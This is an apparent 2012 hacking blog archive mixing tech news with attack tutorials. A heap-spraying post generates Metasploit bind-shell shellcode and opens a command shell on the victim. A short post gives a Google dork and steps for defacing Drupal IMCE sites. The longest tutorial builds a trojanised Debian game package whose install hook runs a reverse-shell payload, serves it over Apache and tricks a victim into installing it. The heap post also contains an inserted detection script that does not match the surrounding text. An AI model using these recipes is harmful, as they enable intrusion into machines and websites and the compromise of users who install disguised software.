Saturday 28 July 2012

3D tablet

Swipe Telecom launched a range of tablets here, including the country's "first 3D tablet".



The tablets are priced in the range of Rs. 5,999 to Rs. 6,999, while the one with phone facility is priced at Rs. 8,999. The 3D tablet is called Swipe Tab X745 and is priced at Rs. 5,999.
The company claims that these are the fastest and lightest devices in the category.


Key specs for Swipe Tab X745
  • Screen Size: 7" TFT Five Capacitive touch
  • Processor: Allwinner A13 Cortex A8 @ 1.2GHz-1.5GHz, Mali-400 high-end GPU
  • RAM: 512MB DDR3
  • Display: 800x480 pixels
  • Camera: 2.0 megapixels
  • OS: Android Ice Cream Sandwich
  • Battery: 3200 mAh
  • Memory: 4GB and expandable up to 8GB

Tuesday 24 July 2012

Heap hacking

HEAP SPRAYING USING NOP'S & IMMUNITY DEBUGGER

HI GUYS SEEKER HERE TODAY AFTER FEW DAYS OF STUDY AND RESEARCH I CAME UP WITH THIS NEW TRICK OF HACKING..


HEAP HACKING USING IMMUNITY DEBUGGER

What is this attack all about??

In this attack we will use IMMUNITY DEBUGGER to decipher NOP shellcode. People who are new to the hacking world might not know what NOP and IMMUNITY DEBUGGER are, so I will give a brief introduction to both of them.

What is NOP?

No-operation instruction (NOP) and NOP slide. A NOP is an assembly instruction that says, “Do nothing and move to the next instruction.” A NOP slide comprises multiple NOPs adjacent to each other in memory, basically taking up space. If a program’s execution flow encounters a series of NOP instructions, it will linearly “slide” down to the end of them to the next instruction. A NOP, in the Intel x86 architecture, has an opcode of 90, commonly seen in exploit code as \x90.

What is the use of NOP in heap spraying technique?

The heap spraying technique involves filling the heap with a known repeating pattern of NOP slides and your shellcode until you fill the entire memory space with this known value. You’ll recall that memory in the heap is dynamically allocated at program runtime. The filling is usually done via JavaScript, which causes the browser’s allocated memory to grow significantly. The attacker fills large blocks of memory with NOP slides and places the shellcode directly after them. When program execution flow is altered and randomly jumps somewhere into memory, there is a good chance of hitting a NOP slide and eventually hitting the shellcode. Once the victim hits the shellcode, he/she is exploited and we get his command shell.

What does a NOP slide look like in the shellcode?

In the above snapshot you can see the hexadecimal representation of \x90, the Intel x86 architecture opcode. A 90 in Intel x86 assembly is a NOP. Here you see a series of \x90s that create our NOP-slide effect. The rest of the code is the payload, such as a reverse shell or a Meterpreter shell.
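A detection-side view of the pattern described above, as an added example that is not part of the original post: a memory or traffic scanner can flag a buffer that combines a long NOP run with many identical blocks. The thresholds, the block size and both sample buffers are assumptions, and the 0xCC bytes are a constructed stand-in for a payload.

```python
from collections import Counter

def longest_run(buf, value=0x90):
    """Return (offset, length) of the longest run of `value` bytes in buf."""
    best_off, best_len, start = 0, 0, None
    for i, b in enumerate(buf):
        if b == value:
            if start is None:
                start = i
            if i - start + 1 > best_len:
                best_off, best_len = start, i - start + 1
        else:
            start = None
    return best_off, best_len

def repeated_block_ratio(buf, block=4096):
    """Fraction of fixed-size blocks that are copies of the most common block."""
    blocks = [bytes(buf[i:i + block]) for i in range(0, len(buf) - block + 1, block)]
    if not blocks:
        return 0.0
    return Counter(blocks).most_common(1)[0][1] / len(blocks)

def looks_like_spray(buf, min_sled=256, min_ratio=0.8, block=4096):
    """Heuristic only: a long sled AND mostly identical blocks.
    Sprays may use sled bytes other than 0x90, so `value` in longest_run
    is a parameter and a scanner would try several candidates."""
    _, sled = longest_run(buf)
    return sled >= min_sled and repeated_block_ratio(buf, block) >= min_ratio

# Constructed sample: 64 identical 4 KiB blocks, each a sled plus filler bytes.
SPRAY_SAMPLE = (b"\x90" * 4000 + b"\xcc" * 96) * 64
# Constructed benign sample: varied data in which 0x90 never repeats back to back.
BENIGN_SAMPLE = bytes((i * i) % 251 for i in range(16384))
```

Requiring both signals keeps false positives down: padding or zero-filled buffers repeat but contain no sled, and ordinary code contains short NOP runs but does not repeat block after block.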

What is IMMUNITY DEBUGGER?

To understand the NOP slide we will use IMMUNITY DEBUGGER, but before doing that you should know what Immunity Debugger is. On your Windows XP target, download and install Immunity Debugger from http://www.immunityinc.com/.
Immunity Debugger is a powerful new way to write exploits, analyze malware, and reverse engineer binary files. It builds on a solid user interface with function graphing, the industry's first heap analysis tool built specifically for heap creation, and a large and well supported Python API for easy extensibility.
  • A debugger with functionality designed specifically for the security industry
  • Cuts exploit development time by 50%
  • Simple, understandable interfaces
  • Robust and powerful scripting language for automating intelligent debugging
  • Lightweight and fast debugging to prevent corruption during complex analysis
  • Connectivity to fuzzers and exploit development tools

LETS START THE HACKING!!!!

1 seeker@bt#msfpayload windows/shell/bind_tcp LPORT=443 E 
// Use the msfpayload command to generate sample shellcode for a simple TCP bind shell listening on port 443. When this command is executed it generates two shellcodes, stage 1 and stage 2. Here we are concerned only with the stage 1 shellcode, because Metasploit will send the stage 2 code for us when we connect to it. //
2 Copy and paste the shellcode from stage 1 into a text editor. You’ll need to do some editing before proceeding. Now that you have your basic shellcode, add as many NOPs as you want to the beginning of it (such as \x90\x90\x90\x90\x90). Then remove all \x occurrences so it looks similar to the below snapshot.
 
3 Now install Immunity Debugger on your victim machine and open any executable. Here we are exploiting the browser, so we will use iexplore.exe, opened from:
FILE -> OPEN -> and the path where your iexplore.exe is
4 You should see a number of assembly instructions in the main window. Left-click the first instruction on the screen, and hold down SHIFT while left-clicking to highlight some instructions below it.
5 Copy the shellcode from your text file generated from msfpayload, then right-click in the Immunity Debugger window and choose Binary -> Binary paste. This will paste the assembly instructions from our text file into the Immunity Debugger window.
 

6 When we first exported our shellcode in a bind_tcp format, the last instruction through stage 1 ended with ecc3. Locate the last set of memory instructions we added ending in ecc3. Right after the ecc3, press F2 to create a breakpoint, and at the start of our shellcode press F2 to create a breakpoint.

7 Open up a command prompt and type netstat -an. Nothing should be listening on 443, and this is a good sign that your payload hasn’t executed yet.

8 seeker@bt3# msfcli multi/handler PAYLOAD=windows/shell/bind_tcp RHOST=192.168.57.82 LPORT=443 E


///WE USE THIS COMMAND TO CREATE THE LISTENER ON PORT 443 WHICH WILL CONNECT THE STAGE 2 WITH THE STAGE 1 LISTENER///



9 NOW PRESS F9 IN THE IMMUNITY HANDLER AND BINGOOOO IT RUNS THE SHELL CODE AND WE GET THE COMMAND SHELL OF THE VICTIM..


msf exploit(handler) > exploit
[*] Starting the payload handler...
[*] Started bind handler
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.57.73:60463 -> 192.168.57.82:443)



/////EDUCATIONAL PURPOSE ONLY////
 

Sunday 22 July 2012

Drupal IMCE Website Hacking


 Google Dork: inurl:"/imce?dir="

Find a vulnerable website:

Now Navigate To Folders Like Root etc
Click Upload

Select A Html Or Php Deface Page

Click Upload


Now you can access your defaced page

Note: Some sites may only accept .jpg or .png formats

Thursday 12 July 2012

Yahoo hack leaks 453000 unencrypted passwords

A previously unknown hacker group has posted online the details of 450,000 user accounts and passwords it claims to have taken from a Yahoo server.


A Yahoo spokesperson in Singapore declined to comment.

The affected accounts appeared to belong to a Voice over Internet Protocol (VoIP) service called Yahoo Voices...


Tuesday 10 July 2012

Ethical Hacking in ludhiana

::::: Recover your Hacked Facebook Account Page, Email Id or Website  ::::::

Investigate cyber case with Cyber Crime Investigator Team

T.A.C Security Solutions, Ludhiana, Punjab, India.


Tuesday 3 July 2012

Who is the owner of Facebook?

Facebook is not Mark Zuckerberg's - Said By Indian

A 28-year-old, Divya Narendra, son of an Indian immigrant doctor couple in the U.S., has gone to court in a battle with Facebook CEO Mark Zuckerberg. He believes that he, and not Mark Zuckerberg, came up with the idea of the social networking website Facebook.

Narendra, along with his former Harvard University classmates Tyler Winklevoss and Cameron Winklevoss, has charged Zuckerberg with stealing the idea they conceived over a year, when they were students at Harvard University.




"I spent almost one year developing the concept and searching for programmers (along with the Winklevoss twins) to build what was then called Harvard-Connection.com (a social network for Harvard students which was to expand to other schools). When I heard about Mark Zuckerberg for the first time in the fall of 2003, he seemed like a natural fit to join our team. Three months later, Facebook launched and all the time and effort I had put into my vision had been taken away," Narendra said.

He and the twins first tried to convince Harvard's administrative board and president (Larry Summers) to take action against Zuckerberg. But they had to file a lawsuit as the matter was outside the jurisdiction of the university. While an initial settlement had been reached in the suit, reportedly at $65 million, it was reopened in May 2010. If the current suit goes in favour of Narendra and his friends, the value of the settlement could escalate to about $466 million.



must comment

Monday 2 July 2012

LINUX IS not SECURE virus for linux

WHO SAY LINUX IS SECURE (VIRUS FOR LINUX)

TODAY I WILL SHOW YOU A 100% WORKING VIRUS FOR LINUX, AND HOW TO CREATE IT FROM BACKTRACK.

FOR PEOPLE WHO THINK THAT VIRUSES AND TROJANS ARE FOR WINDOWS ONLY, HERE I GIVE YOU A VIRUS PACKAGE FOR LINUX.

First we need to download the package that I will infect and move it to a temporary working directory. In my example, I will use the package 'freesweep'.

1 seeker@bt#apt-get --download-only -install freesweep  

 //this command downloads the freesweep package ///

2 seeker@bt#mkdir /tmp/evil  

//this command is used to create the directory evil in the temp directory///


3 seeker@bt# mv /var/cache/apt/archives/freesweep_0.90-2_i386.deb /tmp/evil

//this command will move the freesweep package from archives to evil directory//

4 seeker@bt# cd /tmp/evil/


5 seeker@bt:/tmp/evil#dpkg -x freesweep_0.90-2_i386.deb work

 //this command will extract the package to a working directory//


6 seeker@bt:/tmp/evil#mkdir work/DEBIAN

///Now we need to create a DEBIAN directory to hold our additional added features. ///


7 seeker@bt:/tmp/evil/work/DEBIAN#vi control 

//In the 'DEBIAN' directory, create a file named 'control' that contains the following data as shown in snapshot//



8 seeker@bt:/tmp/evil/work/DEBIAN#vi postinst

// this command creates a post-installation script that will execute our binary. In our 'DEBIAN', we'll create a file named 'postinst' that contains the following data as shown in snapshot//





9 seeker@bt#msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.57.78  LPORT=443 X >
/tmp/evil/work/usr/games/freesweep


////this command is used to create a malicious payload that uses a  reverse shell to connect back to us named freesweep////



10 seeker@bt:/tmp/evil/work/DEBIAN#chmod 755 postinst

//in this command we make our script executable//


11 seeker@bt:/tmp/evil/work/DEBIAN#dpkg-deb --build /tmp/evil/work

//this command is used to build our new package work.deb///


12 seeker@bt:/tmp/evil#mv work.deb freesweep.deb

//change that to freesweep.deb //

13 seeker@bt:/tmp/evil#cp freesweep.deb /var /www/

//now we copy our malicious package to www directory to host it on apache///

14 seeker@bt:/tmp/evil#service apache2 start

//this command is used to start the apache service/// 




15 seeker@bt#msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp  LHOST=192.168.57.78 LPORT=443 E

//now we will  set up the Metasploit multi/handler to receive the incoming connection.//

16 ///in this step we convince our UBUNTU victim to download the package (game) and install that package.////


victim@ubuntu:~$ wget http://192.168.57.78/freesweep.deb

victim@ubuntu:~$ sudo dpkg -i freesweep.deb
 

//NOW WHEN THE USER INSTALLS OUR GAME WE GET THE COMMAND LINE SESSION//

 
 
 
 

 1000% WORKING

//EDUCATIONAL PURPOSE ONLY :)
Tutorial By Parvesh Janartha | King Metasploit | IT Security Consultant